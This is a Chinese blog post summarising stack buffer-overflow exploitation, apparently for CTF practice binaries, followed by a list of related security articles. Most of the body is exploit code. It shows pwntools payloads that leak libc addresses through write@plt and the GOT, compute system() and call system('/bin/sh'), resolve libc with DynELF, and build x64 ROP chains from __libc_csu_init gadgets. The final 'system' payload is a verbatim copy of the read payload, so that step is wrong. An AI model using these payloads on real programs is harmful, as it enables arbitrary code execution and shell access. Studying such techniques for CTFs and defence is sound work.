泄露地址和利用总结

最新推荐文章于 2023-08-19 18:27:49 发布
最新推荐文章于 2023-08-19 18:27:49 发布
阅读量872 收藏
点赞数 1
分类专栏: 漏洞溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bme314/article/details/95869819
版权

已知libc.so

栈执行保护---------->调用libc.so system("/bin/sh")
关闭ASLR system在内存中的地址不会变化

如果elf中调用了print和read,那么我们就可以搜索内存直接调用。
如果开启ASLR, 我们可以根据got得到print@plt和system在libc.so中的偏移得到system
的地址。

read@plt write@plt 以及相关的got可以在调用的程序中通过elf格式搜索位置。因为程序本身的地址是不变化的。

当然 /bin/sh 字符串也可以在libc.so中的到。

所以关键就是得到libc.so的偏移。也就是突破aslr.

1.溢出点位置测试,
1) python pattern.py create 150生成字符串
2) python pattren.py offset 0x37654136
140

..........................................................................                                           低地址
                                                                                                                        +
                                                                                                                        +       	
 esp--->	buf->........                 //局部变量,保存的寄存器                             +              <-+
	                     .......                                                                                        +                 +
 esp--->  ebp   保存的ebp        //offset   0x37654136    140                            +                 +
   	                    ret                    //                                   144                             +            [esp-144]
   	                   参数1                                                                                        +
    	               参数2                                                                                        +
      	               参数.....                                                                                     +
.......................................................................                                          高地址

ssize_t write(int fd,const void *buf,size_t nbytes)

payload1 = ‘a’*140+p32(plt_wrtie)+p32(vulfun_addr)+p32(1)+p32(got_write)

..........................................................................                              低地址
                                                                                                           +
                                                                                                           +       	
 esp--->	buf->........                 //'a'*140                                             +              <-+
	                    .......                                                                            +                 +
 esp--->  ebp   保存的ebp        //                                                         +
   	                    ret                    //            p32(plt_wrtie)  //可调用         +             [esp-144]
   	                    参数1                               p32(vulfun_addr)                 +      //ret指向新函数增加一个返回函数
    	                参数2                               p32(1)                                 +
      	                参数.....                             p32(got_write)                    + 
                        .......                                  p32(4)
.......................................................................                               高地址

write_addr = p32.(p.recv(4))

system_addr = write_addr - (libc.symbols[‘write’]-libc.symbols[‘system’])

payload2 = ‘a’*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)

小结

这里构造栈的时候有一个注意点,因为完整的调用栈是返回地址,参数1,2,3.这样子。当我们把返回地址参数覆盖的时候。程序返回的那个时刻,esp到了原来参数1的位置。eip跳转到了ret被覆盖的位置。那么此时栈的数据中,原来参数1所在的位置将会是此时新栈的ret地址。原来参数2,3,4的位置将会变成新函数栈参数1,2,3对应的位置。

不知道libc.so

d = DynELF(leak, elf=ELF('./level2'))
system_addr = d.lookup('system', 'libc')

.bss段是用来保存全局变量的值的,地址固定,并且可以读可写。

bss_addr = 0x0804a020
pppr = 0x804855d

payload2 = 'a'*140  + p32(plt_read) + p32(pppr) + p32(0) + p32(bss_addr) + p32(8)   //read三个参数
payload2 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)
p.send(payload2)
p.send("/bin/sh\0")

64位溢出

linux_x64_ROP
x86中参数都是保存在栈上,但在x64中的前六个参数依次保存在RDI,RSI,RDX,RCX,R8和 R9中,程序使用的内存地址不能大于0x00007fffffffffff
libc.so __libc_csu_init()

  4005f0:   4c 89 fa                mov    %r15,%rdx                                      <----------------------------
  4005f3:   4c 89 f6                mov    %r14,%rsi
  4005f6:   44 89 ef                mov    %r13d,%edi
  4005f9:   41 ff 14 dc             callq  *(%r12,%rbx,8)
  4005fd:   48 83 c3 01             add    $0x1,%rbx
  400601:   48 39 eb                cmp    %rbp,%rbx
  400604:   75 ea                   jne    4005f0 <__libc_csu_init+0x50>
  400606:   48 8b 5c 24 08          mov    0x8(%rsp),%rbx                         <----------------------------
  40060b:   48 8b 6c 24 10          mov    0x10(%rsp),%rbp
  400610:   4c 8b 64 24 18          mov    0x18(%rsp),%r12
  400615:   4c 8b 6c 24 20          mov    0x20(%rsp),%r13
  40061a:   4c 8b 74 24 28          mov    0x28(%rsp),%r14
  40061f:   4c 8b 7c 24 30          mov    0x30(%rsp),%r15
  400624:   48 83 c4 38             add    $0x38,%rsp
  400628:   c3                      retq

write write.got

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#write(rdi=1, rsi=write.got, rdx=4)
payload1 =  "\x00"*136
payload1 += p64(0x400606) + p64(0) +p64(0) + p64(1) + p64(got_write) + p64(1) + p64(got_write) + p64(8) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload1 += "\x00"*56
payload1 += p64(main)

read /bin/sh

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)

system

#!bash
#rdi=  edi = r13,  rsi = r14, rdx = r15 
#read(rdi=0, rsi=bss_addr, rdx=16)
payload2 =  "\x00"*136
payload2 += p64(0x400606) + p64(0) + p64(0) + p64(1) + p64(got_read) + p64(0) + p64(bss_addr) + p64(16) # pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 += p64(0x4005F0) # mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
payload2 += "\x00"*56
payload2 += p64(main)
inquisiter
关注
专栏目录
二进制安全之——栈相关漏洞
PICACHU+++的博客
09-22 1854
栈主要是用于存储程序运行过程中的局部信息,大小不一,动态增长。栈的内存一般根据函数栈来进行划分(不用函数的程序很少见),不同的函数栈之间是互相隔离的,从而能实现函数的有效切换。函数栈上存储的信息一般包括:临时变量(包括栈保护哨carry)、函数栈的返回栈基址(bp)、函数的返回地址(ip)。
Git信息泄露原理解析及利用总结
wulanlin的博客
01-10 1万+
前言 最近,在和一些人聊天的过程中发现,好多人可以很从容淡定的说出信息收集需要收集Git信息泄露,至于深入的去谈这个漏洞产生的原理时,貌似不太直到这个问题以及相关工具的原理是什么?但作为小白的我始终觉得,对于一个问题只有深入的了解它的原理,并且利用的核心思想才能更好的挖掘和利用它。(可能思想有些“吹毛求疵”了,欢迎大佬们来指教) 那这篇文章,我就尝试从原理上分析一下这个漏洞以及漏洞的利用思想吧!(当然,借鉴了很多前辈的文章,感谢前辈们的分享) 一、Git简介 官方给出的解释是:Git是一个开源的分布
environ泄露地址+orw+uaf
FUCKING12的博客
10-08 651
这个题开了沙箱,有uaf。利用思路:借助environ泄露地址利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
Buuctf(pwn) ez_pz_hackover_2016 泄露地址,retshellcode;调试计算
半岛铁盒的博客
08-13 957
32位,开启了RELRO保护,堆栈地址随机化 没有开启nx保护,可利用写入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 dest大小根本不是0x32,要动态调试看大小其实是 0x16 利用思路: 1.往s参数里写入shellcode,执行vuln函数后让dest造成溢出
栈泄漏实践报告
qq_24599583的博客
10-09 675
0x00 栈溢出是啥呀! 栈溢出是指在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。 例如:read(0, buf, 80); 要想栈溢出,我们????️满足两个条件。 第一,程序要有向栈写入数据的行为; 第二,程序并不限制写入数据的长度。 我们知道,UNIX本身以及其上的许多应用程序都是用C语言编写的,C语言不检查缓冲区的边界。在某些情况下,如果用户输入的数据长度超过应用程序给定的缓冲区,就会覆盖其他数据区。这称作“堆栈溢出或缓冲溢出”。 如果想用栈溢出来执行攻击指令,就要在溢
堆技巧 数组反向越界泄露地址
tbsqigongzi的博客
09-02 313
痛苦痛苦痛苦,调了半天才找到数组起始地址,还是自己太菜了,好好记录一下这题题目给了libc,2.31的题嗯,可以考虑覆盖got表或者hook函数打开ida发现是c++的题,认真分析一下。
威胁情报技战法总结 红队利用企业泄露的敏感信息或暴露的资产进行攻击,蓝队利用情报收缩攻击面 红队利用钓鱼邮件感染控制内部主机
最新发布
09-28
红队,模拟攻击者,利用企业敏感信息的泄露和暴露的资产发起攻击,而蓝队则通过情报分析来收缩攻击面,增强防御。这种对抗体现在以下几个方面: 1. **红队利用企业泄露的敏感信息或暴露的资产攻击** - 红队通过...
前端内存泄露问题总结篇(包括Vue和echarts)
Yolanda_NuoNuo的专栏
09-15 2309
本文以思维导图形式整理了内存泄露知识图谱 一、引起的原因及解决方法,主要是注意闭包、全局变量和定时器、监听事件等 二、vue中的常见内存泄露,主要是 1、注意mounted(onMounted)的时候如果定义了一些全局变量,或者是定时器、监听事件这种的,要在beforeDestroy(beforeMounted)中释放或者移除掉 2、echarts用定时器获取数据的,也是注意在合适的时间移除掉定时器 切换页面(页面销毁)时注意对echarts实例做clear()或者dispose() 三、如何利用devTo
分布式光纤泄露检测总结概要.pdf
09-29
分布式光纤泄露检测是一种先进的管道监控技术,它利用光纤作为传感器,对管道沿线的温度、振动等参数进行实时、连续的监测。本技术在石油、天然气、化工等领域的管道安全上有着广泛的应用,能够及时发现潜在的泄漏...
堆,栈,内存泄露,内存溢出介绍
u013485792的专栏
05-04 1682
简单的可以理解为: heap(堆):是由malloc之类函数分配的空间所在地。地址是由低向高增长的。 stack(栈):是自动分配变量,以及函数调用的时候所使用的一些空间。地址是由高向低减少的。 一、预备知识—程序的内存分配 一个由c/C++编译的程序占用的内存分为以下几个部分 1、栈区(stack)— 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等。其操作方式类似于数据结
初探ROP
KKABqN
03-16 3410
文章目录0x01 前言0x02 什么是ROP0x03 为什么要ROP0x04 基本ROPret2shellcode含义从原理中解析ret2shellcode从例子中解析ret2shellcode发现利用点确定利用前提调试扩展点ret2text含义从例子中解析ret2text发现利用点确定利用前提调试ret2syscall含义从例子中解析ret2syscall的方法细说系统调用在ret2syscal......
内存安全试验:ret2libc绕过DEP另一个例子
weixin_42072280的博客
05-09 833
关于ret2libc的实验原理见我的另一篇博客:https://mp.csdn.net/postedit/89948519 这是ret2libc的又一个例子 这个例子和之前的那个例子区别主要是:之前的那个例子漏洞程序和攻击程序是分开的,而这个实验是在一个程序里面实现的。 虽然看似比之前的那个简单,但是还是遇到了很多问题,现一一记录下来,供自己查阅,也供他人学习。 ...
利用—Chunk extend Overlapping
2201_75735270的博客
08-19 228
overlapping在堆中是一种比较常见的利用手段,其主要原理就是因为某些意外情况我们可以去修改一些已经申请或在空闲状态的堆块的大小,从而造成堆块重叠的情况,而这也就引发了一系列安全隐患。本文涉及相关实验:[高级栈溢出技术—ROP实战](https://www.hetianlab.com/cour.do?wemedia)(ROP的全称为Return-oriented。
2019.7.24 64位程序libc泄露 x64_3
DSR446的博客
08-17 609
1.这是程序,程序中没有system函数也没有/bin/sh字符串,但是函数中有read函数。我们有一下几种解法。①我们用LibcSearcher这个模块进行解题②打本地的时候,我们可以在gdb中,用vmmap指令来找到动态链接库的绝对路径,然后用elf = ELF(‘绝对路径’),来算偏移③我们也可以用ldd指令找到相对路径,然后拷贝到当前路径,然后用ipython,用elf = ELF(‘li...
通过GOT覆写实现ret2libc - 64-bit Linux stack smashing tutorial: Part 3
HappyOrange2014的专栏
04-11 3953
对于如何绕过ASLR,原作者认为有很多办法可以做到,但这里写的方法是非常有意思的一种方式。通过GOT来泄漏库函数地址,以推导出libc中其他函数(如system)的地址,从而获得shell。以下过程给出了译者的个人调试截图,可在实践时参考。由于译者也是初学,翻译及调试过程中也存在一些疑问。
ret2dlresolve超详细教程(x86&x64)
qq_51868336的博客
03-10 5345
X86 前置知识 在Linux中,程序使用_dl_runtime_resolve(link_map,reloc_offset)来对动态链接的函数进行重定位。 而ret2dlresolve攻击的核心就是控制相应的参数及其对应地址的内容,从而控制解析的函数。 延迟绑定 第一次调用一个函数时,先是到plt表,然后jmp到got表 此时got表存的地址是在plt表上 其实也就是jmp got的下一条指令,这里先是push一个数字(该函数在rel.plt上的偏移,reloc_arg,后文会讲到),然后jmp到pl
使用ret2libc攻击方法绕过数据执行保护
热门推荐
海枫的专栏
02-08 2万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
linux中ret2libc入门与实践
counsellor的专栏
08-23 6835
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
64位linux系统:栈溢出+ret2libc ROP attack
weixin_34232363的博客
06-03 910
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
Git信息泄露风险与利用演示
**Git信息泄露利用** 实际上,攻击者可以利用公开的Git仓库,例如`https://github.com/lijiejie/GitHack.git`这样的示例项目,来进行信息泄露的演示。他们可以通过`git clone`命令克隆该仓库,然后运行特定的脚本,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值